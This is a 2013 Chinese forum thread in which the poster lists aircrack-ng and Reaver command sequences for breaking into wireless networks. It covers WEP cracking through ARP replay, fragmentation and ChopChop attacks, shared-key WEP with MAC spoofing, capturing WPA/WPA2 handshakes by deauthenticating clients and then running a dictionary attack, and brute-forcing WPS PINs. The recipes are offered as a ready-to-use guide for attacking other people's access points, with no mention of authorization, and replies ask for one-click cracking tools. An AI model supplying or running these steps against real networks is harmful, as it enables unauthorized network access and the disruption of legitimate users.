Crack WEP Open&Share * WPA/WPA2
beini吧
全部回复
仅看楼主
level 12
镜中X 楼主
图片来自:镜中X的百度相册
镇楼
2013年08月08日 07点08分 1
level 12
镜中X 楼主
楼主的详细记事本丢了,写了各种网络攻击思路.[泪]
幸亏下午没活,整理了下Wireless攻击命令.
一直认为Hack的命令攻击方式是最酷的.
下面开始列出.
2013年08月08日 07点08分 2
level 12
镜中X 楼主
WEP have client
airmon-ng start wlan0
此处混杂无线网卡.wlan0为网卡,其余可自行ifconfig命令查看.可自定义混杂频道,如 airmon-ng start wlan0 13.
13为频道.
airodump-ng -w xxx mon0

airodump-ng -w xxx -c 13 mon0
airodump-ng --ivs -w xxx -c 13 mon0
看情况使用
然后使用ARP-request注入
aireplay-ng -3 -b AP_MAC -h Client_MAC mon0
aircrack-ng xxx.cap or xxx.ivs
破解xxx.cap或xxx.ivs数据包.
也可以加上 -0参数让结果更好看.
aircrack-ng xxx.cap -0
或者可以使用PTW加速破解
aircrack-ng -z xxx.cap -0
(* ̄▽ ̄)y
2013年08月08日 07点08分 3
level 12
镜中X 楼主
WEP not have client
airmon-ng start wlan0
airodump-ng -w xxx -c 13 mon0
aireplay-ng -1 0 -a AP_MAC -h MY_MAC mon0 fakeauth模式 伪装客户端连接
aireplay-ng -5 -b AP_MAC -h MY_MAC mon0 fragment模式 碎片包攻击
或者可以考虑ChopChop
aireplay-ng -4 -b AP_MAC -h MY_MAC mon0 ChopChop模式 Chopchop攻击
加工ARP数据包
packetforge-ng --arp -a AP_MAC -h MY_MAC -k 255.255.255.255 -l 255.255.255.255 -y xxx.xor -w arp
注入加工的ARP数据包
aireplay-ng -2 -r arp mon0
Aircrack-ng CrackMe.cap
: )
2013年08月08日 07点08分 4
level 12
镜中X 楼主
WEP Share
[汗]这个真心比较麻烦,赶脚累不爱.一般情况下我们都是破解WEP开放认证的AP是秒破.这个单纯的伪客户端连接无效.必须有客户端.单纯的ARP注入也没有起色.PS:(如果你有不同意见和指教,欢迎回帖).
airmon-ng start wlan0 12
airodump-ng -c 12 mon0
获得客户端MAC后,Kill掉airodump-ng进程,移除mon0 airmon-ng stop mon0.然后
先ifconfig wlan0 down 关掉自己的网卡,进行下一步
利用Macchanger修改自己网卡MAC和目标AP客户端一致
再ifconfig wlan0 up 启用自己的客户端
airmon-ng start wlan0 12
airodump-ng -w xxx -c 12 mon0
aireplay-ng -1 0 -a AP_MAC -h MY_MAC(也就是现在我们上面更改为目标客户端的MAC)
mon0 开始一直提示share key 什么什么的,抱歉,老夫上了三次剑桥少儿英语初级,都没毕业成功..TnT 等到后面几步会让这里生效的
aireplay-ng -4 -b AP_MAC -h MY_MAC(也就是现在我们上面更改为目标客户端的MAC) mon0 ChopChop攻击,现在这一步也不会生效.稍后就会生效
aireplay-ng -0 1 -a AP_MAC -c Client_MAC mon0 Deautenticate 冲突模式攻击一次,-0 后面的1代表一次,可自行看情况更改.
回到ChopChop命令窗口,看到已经有数据包产生,y确定.
然后
packetforge-ng -0 -a AP_MAC -h MY_MAC(也就是现在我们上面更改为目标客户端的MAC)
-k 255.255.255.255 -l 255.255.255.255 -y (ChopChop产生的两个数据包,一个cap,一个xor.选择xor).xor -w arp
aireplay-ng -2 -r arp mon0 开始注入加工过的数据包
aireplay-ng -3 -b AP_MAC -h Client_MAC(也就是现在我们上面更改为目标客户端的MAC)
mon0 你懂得,这样可以速度更快.
aircrack-ng -z CrackMe.cap
: )
2013年08月08日 08点08分 5
level 12
镜中X 楼主
WPA/WPA2
这个必须有客户端.你懂得.我也就不指定频道了,你们自己摸索吧
airmon-ng sart wlan0
airodump-ng -w xx mon0
aireplay-ng -0 1 -a AP_MAC -c Client_MAC mon0 Deautenticate 冲突模式攻击
看到握手包产生后,Kill掉airodump-ng进程.
然后老规矩
aircrack-ng -w 字典 xx.cap
: )
2013年08月08日 08点08分 6
这个我破解某些很容易,用一个外置windows界面软件就行。有个问题跟楼主沟通:不知道你遇到过攻击某些客户端时信号突然断掉的情况没?
2013年08月11日 17点08分
回复 zhl752212553 :我一般都是在Linux 下攻击,没感觉到掉线。因为攻击时最好不要连其它无线。这样会占用网卡。
2013年08月12日 01点08分
回复 镜中X :我是用启动u盘系统下运行,不知道算不算是linux?这里要说的是,并不是全部ap都是以上情况,大部分还是没问题,但是部分ap在点击攻击抓包过程中突然中断,这个有办法处理吗?是不是和无线路由的型号有关?
2013年08月12日 13点08分
回复 zhl752212553 :这个可能是攻击的太猛烈了,坏笑.那U盘是Linux系统
2013年08月12日 13点08分
level 12
镜中X 楼主
Pin
Reaver工具,你懂得
reaver -i mon0 -b AP_MAC -v -a -n
可以考虑带-c 参数
卡死后不要关闭,另开一Shell(Linux下的命令窗口).
reaver -i mon0 -b 正在PIN的MAC -a -s -vv
2013年08月08日 08点08分 7
level 12
镜中X 楼主
[乖]
以上为我的总结.欢迎回贴
2013年08月08日 08点08分 8
level 15
你别吓我[冷]
2013年08月12日 01点08分 9
[笑眼]老夫帅吧。
2013年08月12日 01点08分
回复 镜中X :好吧 我也去弄一个- -
2013年08月12日 02点08分
[汗]快去快去
2013年08月12日 03点08分
回复 镜中X :算了-- 好猥琐
2013年08月12日 14点08分
level 1
看不懂
2013年08月19日 04点08分 10
level 11
小白路过,楼主威武!
2013年10月03日 17点10分 11
level 9
==,
2013年10月06日 03点10分 12
= =
2013年10月06日 03点10分
回复 镜中X :两个罢休对打
2013年10月23日 17点10分
level 6
我们都是小白,摸不着头脑,大神们能不能开发款一键破解的软件啊?
2013年10月24日 13点10分 13
我会尽量学习,争取写个可以免复杂输入的Shell的
2013年10月24日 14点10分
@镜中X :嗯嗯,大神你有整套软件么?给我一份吧!
2013年10月24日 14点10分
整套软件?Aircrack-ng就是套件啊
2013年10月24日 15点10分
@镜中X :是中文版的么?给个连接吧
2013年10月25日 01点10分
1